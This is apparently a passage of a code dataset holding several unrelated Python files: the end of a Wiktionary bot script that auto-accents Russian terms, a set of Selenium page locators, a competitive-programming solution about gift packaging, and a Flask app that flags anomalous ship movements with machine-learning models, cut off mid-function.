chopped_tr))\n tr = chopped_tr\n newwords.append(ru)\n newtrwords.append(tr)\n # If we saw a manual translit word, note it (see above).\n if tr:\n sawtr = True\n else:\n # Else, a separator. Just copy the separator. If it has\n # translit, copy that as well, else copy the separator\n # directly as the translit (all the separator tokens should\n # pass through translit unchanged). Only flag the need for\n # manual translit expansion if there's an existing manual\n # translit of the separator that's different from the\n # separator itself, i.e. different from what auto-translit\n # would produce. (FIXME: It's arguably an error if the\n # manual translit of a separator is different from the\n # separator itself. 
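# (added sketch, simplified from the code below: once any word carries manual\n  # translit, every empty slot is back-filled so the joined translit stays\n  # aligned with the joined Cyrillic, roughly\n  # newertrwords = [tr or expand_text(\"{{xlit|ru|%s}}\" % ru) for ru, tr in zip(newwords, newtrwords)]\n  # with the whole translit dropped if any {{xlit}} expansion fails.)\n  # 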
We output a warning but maybe we should\n # override the manual translit entirely.)\n newwords.append(word)\n newtrwords.append(trword or word)\n if trword and word != trword:\n pagemsg(\"WARNING: Separator <%s> at index %s has manual translit <%s> that's different from it: %s\" % (\n word, i, trword, origt))\n sawtr = True\n if sawtr:\n newertrwords = []\n got_error = False\n for ru, tr in zip(newwords, newtrwords):\n if tr:\n pass\n elif not ru:\n tr = \"\"\n else:\n tr = expand_text(\"{{xlit|ru|%s}}\" % ru)\n if not tr:\n got_error = True\n pagemsg(\"WARNING: Got error during transliteration\")\n break\n newertrwords.append(tr)\n if not got_error:\n newterm = \"\".join(newwords)\n newtr = \"\".join(newertrwords)\n else:\n newterm = \"\".join(newwords)\n newtr = \"\"\n return newterm, newtr\n\n# Look up a term (and associated manual translit) and try to add accents.\n# The basic algorithm is that we first look up the whole term and then\n# split on words and recursively look up each word individually.\n# We are currently able to handle some bracketed expressions but not all:\n#\n# (1) If we're passed in [[FOO]] or [[FOO BAR]], we handle it as a special\n# case by recursively looking up the text inside the link.\n# (2) If we're passed in [[FOO|BAR]] or [[FOO BAR|BAZ BAT]], we handle it as\n# another special case by recursively looking up the text on the right\n# side of the vertical bar.\n# (3) If we're passed in [[FOO]] [[BAR]], [[FOO]] [[BAR|BAZ]] or\n# [[FOO|BAR]] [[BAZ|BAT]], special cases (1) and (2) won't apply. We then\n# will reject it (i.e. leave it unchanged) during the first lookup but\n# then succeed during the recursive (word-split) version, because we\n# will recursively be able to handle the individual parts by cases\n# (1) and (2).\n# (4) If we're passed in [[FOO BAR]] [[BAZ]], or any other expression with\n# a space inside of a link that isn't the entire term, we can't currently\n# handle it. Word splitting will leave unbalanced \"words\" [[FOO and BAR]],\n# which we will trigger a rejection of the whole expression (i.e. 
it will\n# be left unchanged).\ndef find_accented_1(term, termtr, verbose, pagemsg, expand_text, origt):\n # We can handle plain [[FOO]] or [[FOO BAR]]\n m = re.search(r\"^\\[\\[([^\\[\\]\\|]*)\\]\\]$\", term)\n if m:\n newterm, newtr = find_accented(m.group(1), termtr, verbose, pagemsg, expand_text, origt)\n return \"[[\" + newterm + \"]]\", newtr\n # We can handle [[FOO|BAR]] or [[FOO BAR|BAZ BAT]]\n m = re.search(r\"^\\[\\[([^\\[\\]\\|]*)\\|([^\\[\\]\\|]*)\\]\\]$\", term)\n if m:\n newterm, newtr = find_accented(m.group(2), termtr, verbose, pagemsg, expand_text, origt)\n return \"[[\" + m.group(1) + \"|\" + newterm + \"]]\", newtr\n\n newterm, newtr = find_accented_2(term, termtr, verbose, pagemsg)\n if newterm == term and newtr == termtr:\n words = re.split(r\"((?:[ ,.?!]|''+)+)\", term)\n trwords = re.split(r\"((?:[ ,.?!]|''+)+)\", termtr) if termtr else []\n if trwords and len(words) != len(trwords):\n pagemsg(\"WARNING: %s Cyrillic words but different number %s translit words: %s//%s\" % (len(words), len(trwords), term, termtr))\n elif len(words) == 1:\n if term.startswith(\"-\") or term.endswith(\"-\"):\n # Don't separate a prefix or suffix into component parts; might\n # not be the same word.\n pass\n else:\n # Only one word, and we already looked it up; don't duplicate work.\n # But split on hyphens the second time around.\n words = re.split(r\"(-)\", term)\n trwords = re.split(r\"(-)\", termtr) if termtr else []\n if trwords and len(words) != len(trwords):\n pagemsg(\"WARNING: %s Cyrillic words but different number %s translit words: %s//%s\" % (len(words), len(trwords), term, termtr))\n pass\n elif len(words) == 1:\n # Only one word, and we already looked it up; don't duplicate work\n # or get stuck in infinite loop.\n pass\n else:\n newterm, newtr = find_accented_split_words(term, termtr, words,\n trwords, verbose, pagemsg, expand_text, origt)\n else:\n newterm, newtr = find_accented_split_words(term, termtr, words, trwords,\n verbose, pagemsg, expand_text, origt)\n return newterm, newtr\n\n# Outer wrapper, equivalent to find_accented_1() except outputs extra\n# log messages if --semi-verbose.\ndef find_accented(term, termtr, verbose, pagemsg, expand_text, origt):\n if semi_verbose:\n pagemsg(\"find_accented: Call with term %s%s\" % (term, \"//%s\" % termtr if termtr else \"\"))\n term, termtr = find_accented_1(term, termtr, verbose, pagemsg, expand_text,\n origt)\n if semi_verbose:\n pagemsg(\"find_accented: Return %s%s\" % (term, \"//%s\" % termtr if termtr else \"\"))\n return term, termtr\n\ndef join_changelog_notes(notes):\n accented_words = []\n other_notes = []\n for note in notes:\n m = re.search(\"^auto-accent (.*)$\", note)\n if m:\n accented_words.append(m.group(1))\n else:\n other_notes.append(note)\n if accented_words:\n notes = [\"auto-accent %s\" % \",\".join(accented_words)]\n else:\n notes = []\n notes.extend(other_notes)\n return \"; \".join(notes)\n\ndef check_need_accent(text):\n for word in re.split(\" +\", text):\n word = blib.remove_links(word)\n if u\"\\u0301\" in word or u\"ё\" in word:\n continue\n if not ru.is_monosyllabic(word):\n return True\n return False\n\ndef process_template(pagetitle, index, template, ruparam, trparam, output_line,\n find_accents, verbose):\n origt = unicode(template)\n saveparam = ruparam\n def pagemsg(text):\n msg(\"Page %s %s: %s\" % (index, pagetitle, text))\n def expand_text(tempcall):\n return blib.expand_text(tempcall, pagetitle, pagemsg, semi_verbose)\n if semi_verbose:\n pagemsg(\"Processing template: %s\" % 
unicode(template))\n if unicode(template.name) == \"head\":\n # Skip {{head}}. We don't want to mess with headwords.\n return False\n if isinstance(ruparam, list):\n ruparam, saveparam = ruparam\n if ruparam == \"page title\":\n val = pagetitle\n else:\n val = getparam(template, ruparam)\n valtr = getparam(template, trparam) if trparam else \"\"\n changed = False\n if find_accents:\n newval, newtr = find_accented(val, valtr, verbose, pagemsg, expand_text,\n origt)\n if newval != val or newtr != valtr:\n if ru.remove_accents(newval) != ru.remove_accents(val):\n pagemsg(\"WARNING: Accented page %s changed from %s in more than just accents, not changing\" % (newval, val))\n else:\n changed = True\n addparam(template, saveparam, newval)\n if newtr:\n if not trparam:\n pagemsg(\"WARNING: Unable to change translit to %s because no translit param available (Cyrillic param %s): %s\" %\n (newtr, saveparam, origt))\n elif unicode(template.name) in [\"ru-ux\"]:\n pagemsg(\"WARNING: Not changing or adding translit param %s=%s to ru-ux: origt=%s\" % (\n trparam, newtr, origt))\n else:\n if valtr and valtr != newtr:\n pagemsg(\"WARNING: Changed translit param %s from %s to %s: origt=%s\" %\n (trparam, valtr, newtr, origt))\n if not valtr:\n pagemsg(\"NOTE: Added translit param %s=%s to template: origt=%s\" %\n (trparam, newtr, origt))\n addparam(template, trparam, newtr)\n elif valtr:\n pagemsg(\"WARNING: Template has translit %s but lookup result has none, leaving translit alone: origt=%s\" %\n (valtr, origt))\n if check_need_accent(newval):\n output_line(\"Need accents (changed)\")\n else:\n output_line(\"Found accents\")\n if not changed and check_need_accent(val):\n output_line(\"Need accents\")\n if changed:\n pagemsg(\"Replaced %s with %s\" % (origt, unicode(template)))\n return [\"auto-accent %s%s\" % (newval, \"//%s\" % newtr if newtr else \"\")] if changed else False\n\ndef find_russian_need_vowels(find_accents, cattype, direcfile, save,\n verbose, startFrom, upTo):\n if direcfile:\n processing_lines = []\n for line in codecs.open(direcfile, \"r\", encoding=\"utf-8\"):\n line = line.strip()\n m = re.match(r\"^(Page [^ ]+ )(.*?)(: .*?:) Processing: (\\{\\{.*?\\}\\})( <- \\{\\{.*?\\}\\} \\(\\{\\{.*?\\}\\}\\))$\",\n line)\n if m:\n processing_lines.append(m.groups())\n\n for current, index in blib.iter_pages(processing_lines, startFrom, upTo,\n # key is the page name\n key = lambda x:x[1]):\n\n pagenum, pagename, tempname, repltext, rest = current\n\n def pagemsg(text):\n msg(\"Page %s(%s) %s: %s\" % (pagenum, index, pagetitle, text))\n def check_template_for_missing_accent(pagetitle, index, template,\n ruparam, trparam):\n def output_line(directive):\n msg(\"* %s[[%s]]%s %s: %s%s\" % (pagenum, pagename,\n tempname, directive, unicode(template), rest))\n return process_template(pagetitle, index, template, ruparam, trparam,\n output_line, find_accents, verbose)\n\n blib.process_links(save, verbose, \"ru\", \"Russian\", \"pagetext\", None,\n None, check_template_for_missing_accent,\n join_actions=join_changelog_notes, split_templates=None,\n pages_to_do=[(pagename, repltext)], quiet=True)\n if index % 100 == 0:\n output_stats(pagemsg)\n else:\n def check_template_for_missing_accent(pagetitle, index, template,\n ruparam, trparam):\n def pagemsg(text):\n msg(\"Page %s %s: %s\" % (index, pagetitle, text))\n def output_line(directive):\n pagemsg(\"%s: %s\" % (directive, unicode(template)))\n result = process_template(pagetitle, index, template, ruparam, trparam,\n output_line, find_accents, verbose)\n 
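# (added illustration: a made-up line of the shape the --file regex above\n      # expects is\n      # Page 12 foo: t: Processing: {{l|ru|foo}} <- {{m|ru|foo}} ({{m|ru|foo}})\n      # whose groups unpack as pagenum='Page 12 ', pagename='foo', tempname=': t:',\n      # repltext='{{l|ru|foo}}', rest=' <- {{m|ru|foo}} ({{m|ru|foo}})'.)\n      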
if index % 100 == 0:\n output_stats(pagemsg)\n return result\n\n blib.process_links(save, verbose, \"ru\", \"Russian\", cattype, startFrom,\n upTo, check_template_for_missing_accent,\n join_actions=join_changelog_notes, split_templates=None)\n\npa = blib.init_argparser(\"Find Russian terms needing accents\")\npa.add_argument(\"--cattype\", default=\"vocab\",\n help=\"Categories to examine ('vocab', 'borrowed', 'translation')\")\npa.add_argument(\"--file\",\n help=\"File containing output from parse_log_file.py\")\npa.add_argument(\"--semi-verbose\", action=\"store_true\",\n help=\"More info but not as much as --verbose\")\npa.add_argument(\"--find-accents\", action=\"store_true\",\n help=\"Look up the accents in existing pages\")\npa.add_argument(\"--no-cache\", action=\"store_true\",\n help=\"Disable caching head lookup results\")\n\nparams = pa.parse_args()\nsemi_verbose = params.semi_verbose or params.verbose\nglobal_disable_cache = params.no_cache\nstartFrom, upTo = blib.parse_start_end(params.start, params.end)\n\nfind_russian_need_vowels(params.find_accents, params.cattype,\n params.file, params.save, params.verbose, startFrom, upTo)\n\nblib.elapsed_time()\n","repo_name":"benwing4/WingerBot","sub_path":"find_russian_need_vowels.py","file_name":"find_russian_need_vowels.py","file_ext":"py","file_size_in_byte":25149,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"40"} +{"seq_id":"42080550552","text":"# !@coding :utf-8 \n# !@Time :2021/2/7 16:00\n# !@Author :LiuLei\n\n# 企业列表\nbusiness_list_btn = ('xpath', '//*[@name=\"menu-22001\"]')\nbusiness_check_page = ('xpath', '//li[text()=\"企业列表\"]')\n# 报表列表\nstatement_list_btn = ('xpath', '//*[@name=\"menu-22002\"]')\nstatement_check_page = ('xpath', '//li[text()=\"报表列表\"]')\n\npage_list = [business_list_btn, statement_list_btn]\ncheck_list = [business_check_page, statement_check_page]\n\n# 申报\ndeclare_btn = ('xpath', '//*[@name=\"btn-22002001\"]')\ndeclare_confirm = ('xpath', '//*[@value=\"继续申报\"]')\ndeclare_er = ('xpath', '//*[@id=\"XzjsModal\"]//*[text()=\"确认\"]')\n# 扣款\npayment_btn = ('xpath', '//*[@name=\"btn-22002002\"]')\n# 撤销申报\nrevocation_btn = ('xpath', '//*[@name=\"btn-22002003\"]')\nrevocation_confirm = ('id', 'confirmButton')\n# 设为零申报\nset_zero_btn = ('xpath', '//*[@name=\"btn-22002004\"]')\n# 设为税款申报\nset_tax_btn = ('xpath', '//*[@name=\"btn-22002005\"]')\n# 状态检查\ncheck_status = ('xpath', '//*[@name=\"btn-22002006\"]')\n# 企业查询\nbusiness_filter = ('id', 'filter-qycx')\npage_limt = ('xpath', '//*[@class=\"limit-select\"]')\n# 合计\ntotal = ('xpath', '//*[@id=\"pager\"]/div/span/label')\n# 选择全部\nselect_all = ('xpath', '//*[@class=\"checkbox-master\"]')\n# 查看\nview = '//tbody//tr[%s]//td[18]//*[contains(.,\"查看\")]'\n# 申报状态\ndeclare_status = '//tbody//tr[%s]//td[9]/span'\n# 作废状态\ninvalid_status = '//tbody//tr[%s]//td[12]/span'\n# 申报表名称\ndeclare_name = '//tbody//tr[%s]//td[4]'\n# 显示异常\nshow_error = ('id', 'filter-xsycyy')\n# 撤销状态\nfetch_status = '//tbody//tr[%s]//td[8]'\n# 税款\npay_tax = '//tbody//tr[%s]//td[14]'\n# 勾选框\nselect_box = '//tbody//tr[%s]//td[1]/input'\n# 企业名称\nname = '//tbody//tr[%s]//td[3]'\n# 异常内容\nerror = '//tbody//tr[%s]//td[13]'\n","repo_name":"James-Bond-Liu/Auto_Test","sub_path":"company_project/weeapi_autotest/element/WeEasy/el_declare_page.py","file_name":"el_declare_page.py","file_ext":"py","file_size_in_byte":1826,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"9916470661","text":"# 세훈이의 선물가게\r\n\"\"\"\r\n세훈이는 
선물가게를 운영한다. 세훈이의 선물가게는 특이��게도 손님이 어떤 선물을 구매할지 선택할 수가 없다.\r\n대신 세훈이의 취향으로 랜덤하게 준비된 선물 중 몇 개를 구매할 것인지, 파란색과 빨간색 중 어떤 색으로 포장 받을 것인지만 결정해 주문할 수 있다.\r\n\r\n상민이와 지수는 세훈이의 가게에서 선물 포장을 맡은 아르바이트생이다.\r\n손님들은 파란색 포장지를 원하면 상민이에게, 빨간색 포장지를 원하면 지수에게 주문을 한다.\r\n두 사람은 각자 주문을 받으면 그때부터 포장을 시작하는데, 현재 남아있는 선물 중 가장 앞에 있는 선물을 가져와 포장하고 주문을 받은 개수만큼 이를 반복하는 형태다.\r\n이때 선물 하나를 포장하는 데 상민이는 A초, 지수는 B초가 걸린다.\r\n두 사람 모두 받거나 밀린 주문이 없는데 미리 선물을 가져오거나 포장하는 일은 없으며,\r\n두 사람이 동시에 선물을 가져올 때는 알바짬이 조금 더 있는 상민이가 먼저 가져오고, 지수가 그 뒤의 선물을 가져온다.\r\n\r\n세훈이는 어제 구매한 선물이 망가져 있다는 항의 전화를 받았다.\r\n자신이 준비한 선물에는 문제가 없었기에 손님에게 포장지의 색을 물었지만, 손님은 자신이 받은 선물이 무엇인지만 말하며 화를 낼 뿐이었다.\r\n어쩔 수 없이 세훈이는 어제 가게를 방문한 손님들의 주문 내역을 보고 그 선물을 누가 포장했는지 파악하려 한다.\r\n\r\n방문한 손님의 수와 각 손님이 주문한 시각, 선택한 포장지, 포장 받을 선물의 개수가 주어졌을 때 상민이와 지수가 각자 어떤 선물들을 포장했는지 알아내는 프로그램을 작성해보자.\r\n\"\"\"\r\nimport sys\r\n\r\nmakingTimeBlue, makingTimeRed, customerCount = map(int, sys.stdin.readline().rstrip().split())\r\nblueStartTime = 0\r\nredStartTime = 0\r\npackagedProducts = []\r\n\r\n\r\ndef package(orderQuantity, startTime, selectedTime, color):\r\n for j in range(orderQuantity):\r\n product = (startTime + (j * selectedTime), color)\r\n packagedProducts.append(product)\r\n\r\n\r\nfor i in range(customerCount):\r\n orderAt, color, orderQuantity = sys.stdin.readline().rstrip().split()\r\n orderAt = int(orderAt)\r\n orderQuantity = int(orderQuantity)\r\n\r\n if color == \"B\":\r\n selectedTime = makingTimeBlue\r\n startTime = max(orderAt, blueStartTime)\r\n package(orderQuantity, startTime, selectedTime, color)\r\n blueStartTime = startTime + (makingTimeBlue * orderQuantity)\r\n else:\r\n selectedTime = makingTimeRed\r\n startTime = max(orderAt, redStartTime)\r\n package(orderQuantity, startTime, selectedTime, color)\r\n redStartTime = startTime + (makingTimeRed * orderQuantity)\r\n\r\nsortStandard = [\"B\", \"R\"]\r\npackagedProducts.sort(key=lambda x: (x[0], sortStandard.index(x[1])))\r\nblueMade = []\r\nredMade = []\r\nfor i in range(len(packagedProducts)):\r\n if packagedProducts[i][1] == \"B\":\r\n blueMade.append(i+1)\r\n else:\r\n redMade.append(i+1)\r\nprint(len(blueMade))\r\nprint(*blueMade)\r\nprint(len(redMade))\r\nprint(*redMade)\r\n\r\n\r\n\"\"\"\r\n2 2 2\r\n1 B 5\r\n1 R 5\r\n\r\n1 2 3\r\n1 B 10\r\n1 R 3\r\n2 R 3\r\n\r\n\r\n\"\"\"","repo_name":"JunInMay/journey-to-baekjoon","sub_path":"baekjoon/baekjoon_17225.py","file_name":"baekjoon_17225.py","file_ext":"py","file_size_in_byte":3359,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"23539203695","text":"import os\r\nimport numpy as np\r\nimport pandas as pd\r\nfrom flask import Flask,redirect,url_for,render_template,request,jsonify,Response\r\nimport pickle\r\nfrom sklearn.metrics import accuracy_score\r\nimport warnings\r\nwarnings.filterwarnings(\"ignore\")\r\nimport json\r\nfrom sklearn.svm import OneClassSVM\r\nfrom sklearn.preprocessing import StandardScaler,Normalizer\r\nfrom sklearn.metrics import precision_score, recall_score, f1_score, roc_auc_score\r\nfrom tensorflow.keras.layers import Dense, LSTM, Dropout, RepeatVector, TimeDistributed\r\nfrom tensorflow.keras.models import Sequential\r\nimport math\r\nimport joblib\r\nimport geopy.distance\r\nimport tensorflow as tf\r\nfrom tensorflow import keras\r\nfrom sklearn.ensemble import RandomForestRegressor\r\nfrom sklearn.ensemble import IsolationForest\r\nimport plotly.graph_objects as go\r\nfrom sklearn.metrics import mean_squared_error,mean_absolute_error,r2_score\r\nimport matplotlib.pyplot as plt\r\nfrom 
sklearn.impute import SimpleImputer\r\n\r\n\r\nnp.random.seed(1)\r\ntf.random.set_seed(1)\r\napp = Flask(__name__)\r\n\r\nprint('Reading simulation csv')\r\n# df = pd.read_csv('data/complete_journeys.csv')\r\ndf = pd.read_csv('all_ships.csv')\r\n# df = pd.read_csv('data/model_data_preprocess.csv')\r\n\r\nprint('Reading timestamp information')\r\n# Intervals = pd.read_csv('data/interval_list.csv')\r\nIntervals = pd.read_csv('all_ships_interval_list.csv')\r\n\r\n# ANOMALY 1 DATASET///////////////////////////////////////////////\r\n# df_anomalous = pd.read_csv('data/test_route_aliza.csv')\r\n# list_for_models_anomaly_1 = []\r\nlist_for_models = []\r\n\r\n# PORTS /////////////////////////////////////////////////////////\r\nprint('Reading Port information')\r\nports_df = pd.read_csv('ports.csv')\r\nports_df = ports_df.drop('Unnamed: 0',axis=1)\r\n\r\n# SORTING ///////////////////////////////////////////////////////\r\nprint('Sorting by time')\r\nSorted_by_time = df\r\nSorted_by_time = Sorted_by_time.sort_values('BaseDateTime').reset_index().drop('index',axis=1)\r\n\r\n# Sorted_by_time_anomalous_1 = df_anomalous\r\n# Sorted_by_time_anomalous_1 = Sorted_by_time_anomalous_1.sort_values('BaseDateTime').reset_index().drop('index',axis=1)\r\n# SORTED/////////////////////////////////////////////////////////\r\n#This data will be sent at the start of website for ship information\r\nprint(\"Extracting Static data\")\r\nStatic_data = df\r\nStatic_data = Static_data.drop(['BaseDateTime','LAT','LON','SOG','COG','Cargo','TransceiverClass','SourceLat','SourceLon','DestLat','DestLon'],axis=1)\r\nStatic_data = Static_data.groupby('MMSI').first()\r\nStatic_data = Static_data.reset_index()\r\nStatic_data[\"MMSI\"] = Static_data[\"MMSI\"].astype(str)\r\n# print('Extracting timestamps')\r\n# Timer = Sorted_by_time['BaseDateTime'].unique()\r\nTimestamps = 0\r\n\r\n\r\n# MODELS ////////////////////////////////////////////////////////\r\nanomaly_1_model = tf.keras.models.load_model('route_model.h5')\r\n\r\n\r\nanomaly_2_model = ''\r\nfilename = 'isolation_forest_model.pkl'\r\n# Load the saved model from the file\r\nwith open(filename, 'rb') as file:\r\n anomaly_2_model = pickle.load(file)\r\n\r\n\r\nscaler=Normalizer()\r\nbounds = pd.read_csv(\"speed_bounds_update.csv\")\r\n# # Saved model file \r\n# with open('model_rf_v3_norm.pkl', 'rb') as f:\r\n# rf_regressor = pickle.load(f)\r\n\r\ndef anomaly_1(df_temp):\r\n cols_keep=['LAT','LON','Heading','SourceLat','SourceLon','DestLat','DestLon']\r\n df_temp = df_temp.drop([col for col in df_temp.columns if col not in cols_keep], axis=1)\r\n df_temp=df_temp.dropna(axis=0)\r\n if df_temp.shape[0] > 0:\r\n scaler = StandardScaler()\r\n data = scaler.fit_transform(df_temp)\r\n y_pred=1\r\n anomaly=0\r\n y_pred=anomaly_1_model.predict(data)\r\n mse=np.mean(np.square(y_pred-data),axis=1)\r\n threshold=1.1\r\n binary_predictions = np.where(mse <= threshold, 1, 0)\r\n unique_values, value_counts = np.unique(binary_predictions, return_counts=True)\r\n most_common_value = unique_values[np.argmax(value_counts)]\r\n if most_common_value == 0:\r\n return 1\r\n else:\r\n return -1\r\n return 1\r\n\r\ndef Cargo_Anomaly(data):\r\n selected_features = ['SourceLat', 'SourceLon', 'DestLat', 'DestLon', 'LAT','LON','distance','segment_speed','VesselType','Cargo']\r\n data = data[selected_features]\r\n # Predict anomaly scores for the new data\r\n anomaly_scores = anomaly_2_model.decision_function(data)\r\n predictions = anomaly_2_model.predict(data)\r\n # Step 6: Analyze Results\r\n 
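# (added background, not from the original: scikit-learn's IsolationForest\r\n    # returns -1 for anomalies and 1 for inliers from predict(), while\r\n    # decision_function() gives a continuous score where lower means more\r\n    # anomalous; e.g. clf.predict(X) might give array([ 1, -1 ]) for one normal\r\n    # and one outlying row.)\r\n    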
anomaly_df = pd.DataFrame({'AnomalyScore': anomaly_scores, 'IsAnomaly': predictions}, index=data.index)\r\n anomaly_df['IsAnomaly'] = anomaly_df['IsAnomaly'] # Convert -1/1 labels to boolean values\r\n return anomaly_df['IsAnomaly'].iloc[-1]\r\n\r\n\r\ndef anomaly_2_distance(lat1, lon1, lat2, lon2):\r\n # convert decimal degrees to radians\r\n lat1, lon1, lat2, lon2 = map(math.radians, [lat1, lon1, lat2, lon2])\r\n # haversine formula\r\n dlon = lon2 - lon1\r\n dlat = lat2 - lat1\r\n a = math.sin(dlat / 2) ** 2 + math.cos(lat1) * \\\r\n math.cos(lat2) * math.sin(dlon / 2) ** 2\r\n c = 2 * math.asin(math.sqrt(a))\r\n r = 6.378e+6 # Radius of earth in kilometers\r\n return c * r\r\n\r\ndef anomaly_2_speed(vessel_points1):\r\n vessel_points1['BaseDateTime'] = pd.to_datetime(vessel_points1['BaseDateTime'])\r\n vessel_points1 = vessel_points1.sort_values(['BaseDateTime'])\r\n vessel_points1 = vessel_points1.drop_duplicates(subset=[\"LAT\", \"LON\"], keep='first')\r\n vessel_points1 = vessel_points1.dropna()\r\n\r\n vessel_points1['time_diff'] = (vessel_points1['BaseDateTime'].diff().dt.total_seconds())\r\n\r\n for i in range(1, len(vessel_points1)):\r\n lat1, lon1 = vessel_points1.iloc[i - 1]['LAT'], vessel_points1.iloc[i-1]['LON']\r\n lat2, lon2 = vessel_points1.iloc[i]['LAT'], vessel_points1.iloc[i]['LON']\r\n dist = anomaly_2_distance(lat1, lon1, lat2, lon2)\r\n vessel_points1.at[vessel_points1.index[i], 'distance'] = dist\r\n\r\n vessel_points1['segment_speed'] = (vessel_points1['distance']) / vessel_points1['time_diff']\r\n\r\n # vessel_points1 = vessel_points1.drop(index=vessel_points1[vessel_points1['distance'] == 0.0].index)\r\n vessel_points1 = vessel_points1.drop(index=vessel_points1[vessel_points1['time_diff'] == 0.0].index)\r\n # vessel_points1 = vessel_points1.drop(index=vessel_points1[vessel_points1['segment_speed'] == 0.0].index)\r\n vessel_points1 = vessel_points1.dropna()\r\n\r\n return vessel_points1\r\n\r\ndef anomaly_2(X_test):\r\n vessel_data = anomaly_2_speed(X_test)\r\n X_Test_first = vessel_data[['SourceLat', 'SourceLon', 'DestLat', 'DestLon', 'LAT', 'LON', 'time_diff', 'distance']].values\r\n X_Test_cargo = vessel_data\r\n return Cargo_Anomaly(X_Test_cargo)\r\n\r\n\r\n\r\ndef anomaly_3(X_test,bounds):\r\n # # Calculate distance, time difference as model features\r\n # vessel_data = calculate_speed(X_test)\r\n # X_Test_first = vessel_data[['SourceLat', 'SourceLon', 'DestLat', 'DestLon','LAT', 'LON', 'Heading','SOG','time_diff', 'distance']].values\r\n \r\n # # Save the speed ranges for the Source and Destination of input data\r\n # filtered_data = bounds[\r\n # (bounds['SourceLatitude'] == X_test['SourceLat'].iloc[0]) &\r\n # (bounds['SourceLongitude'] == X_test['SourceLon'].iloc[0]) &\r\n # (bounds['DestLatitude'] == X_test['DestLat'].iloc[0]) &\r\n # (bounds['DestLongitude'] == X_test['DestLon'].iloc[0])\r\n # ]\r\n\r\n # # Check if any matching rows exist\r\n # if not filtered_data.empty:\r\n # # Extract upper bound and lower bound\r\n # upper_bound = filtered_data['upper_bound'].values[0]\r\n # lower_bound = filtered_data['lower_bound'].values[0]\r\n\r\n # #predict speed of vessel it should be moving at\r\n # X_scaled = scaler.transform(X_Test_first)\r\n # segment_speed_pred = rf_regressor.predict(X_scaled)\r\n # data_length = len(X_test) - 1\r\n # #save anomalous indexes from the original data frame\r\n # anomalies_indices = np.where((segment_speed_pred > upper_bound) | (segment_speed_pred < lower_bound))[0]\r\n # #return -1 for anomaly and 0 for no anomaly\r\n # if 
anomalies_indices.size > 0:\r\n # last_anomaly_index = anomalies_indices[-1]\r\n # if last_anomaly_index == data_length:\r\n # return -1\r\n # else:\r\n # return 0\r\n # else:\r\n # return 0\r\n return 1\r\n\r\n\r\n\r\n\r\n\r\n#////////////////////////////////////////////////////////////////////////// WEBPAGES //////////////////////////////////////////////////////////////////////////\r\n@app.route('/')\r\ndef index():\r\n return render_template('index.html')\r\n\r\n@app.route('/favicon.ico')\r\ndef favicon():\r\n return send_from_directory(os.path.join(app.root_path, 'static'),'images/favicon.ico', mimetype='image/vnd.microsoft.icon')\r\n\r\n@app.route('/Static_Data')\r\ndef Static_Data():\r\n return Static_data.to_json()\r\n\r\n@app.route('/Port_info')\r\ndef Port_info():\r\n return ports_df.to_json()\r\n\r\n@app.route('/Current_Time_Information')\r\ndef Current_Time_Information():\r\n global Timestamps\r\n global list_for_models\r\n \r\n temp_df = Sorted_by_time.iloc[Intervals['StartIndex'][int(Timestamps)]:Intervals['EndIndex'][int(Timestamps)]].reset_index().drop('index',axis=1)\r\n for j in range(0,len(temp_df['MMSI'])):\r\n index = -1\r\n temp_val = temp_df['MMSI'][j]\r\n for k in range(0,len(list_for_models)):\r\n if list_for_models[k][0] == temp_val:\r\n index = k\r\n break\r\n if index == -1:\r\n row = temp_df.loc[j]\r\n new_df = pd.DataFrame(row).transpose()\r\n temp_list = [temp_val,new_df]\r\n list_for_models.append(temp_list)\r\n else:\r\n s = pd.Series(temp_df.loc[j])\r\n list_for_models[index][1].loc[len(list_for_models[index][1])] = s.values\r\n list_for_models[index][1] = list_for_models[index][1].sort_index()\r\n \r\n # temp_df_anomalous_1 = Sorted_by_time_anomalous_1.iloc[Intervals['StartIndex'][int(Timestamps)]:Intervals['EndIndex'][int(Timestamps)]].reset_index().drop('index',axis=1)\r\n # for j in range(0,len(temp_df_anomalous_1['MMSI'])):\r\n # index = -1\r\n # temp_val = temp_df_anomalous_1['MMSI'][j]\r\n # for k in range(0,len(list_for_models_anomaly_1)):\r\n # if list_for_models_anomaly_1[k][0] == temp_val:\r\n # index = k\r\n # break\r\n # if index == -1:\r\n # row = temp_df_anomalous_1.loc[j]\r\n # new_df = pd.DataFrame(row).transpose()\r\n # temp_list = [temp_val,new_df]\r\n # list_for_models_anomaly_1.append(temp_list)\r\n # else:\r\n # s = pd.Series(temp_df_anomalous_1.loc[j])\r\n # list_for_models_anomaly_1[index][1].loc[len(list_for_models_anomaly_1[index][1])] = s.values\r\n # list_for_models_anomaly_1[index][1] = list_for_models_anomaly_1[index][1].sort_index()\r\n \r\n temp = Sorted_by_time.iloc[Intervals['StartIndex'][int(Timestamps)]:Intervals['EndIndex'][int(Timestamps)]].reset_index().drop('index',axis=1).to_json()\r\n Timestamps = Timestamps + 1\r\n return temp\r\n\r\n@app.route('/ai_models')\r\ndef ai_models():\r\n anomalies = []\r\n for i in range(0,pd.DataFrame(list_for_models).shape[0]):\r\n predictions = []\r\n predictions.append(anomaly_1(list_for_models[i][1]))\r\n if list_for_models[i][1].shape[0] > 2:\r\n predictions.append(anomaly_2(list_for_models[i][1]))\r\n predictions.append(anomaly_3(list_for_models[i][1], bounds))\r\n curr_MMSI = list_for_models[i][0]\r\n time_stamp = list_for_models[i][1].reset_index().drop(\"index\",axis=1)[\"BaseDateTime\"][0]\r\n anomalies.append([curr_MMSI, str(time_stamp), predictions])\r\n anomalies_df = pd.DataFrame(anomalies)\r\n return anomalies_df.to_json()\r\n # return pd.DataFrame(list_for_models).to_json()\r\n\r\n@app.route(\"/search\", methods=[\"POST\"])\r\ndef search():\r\n query = 
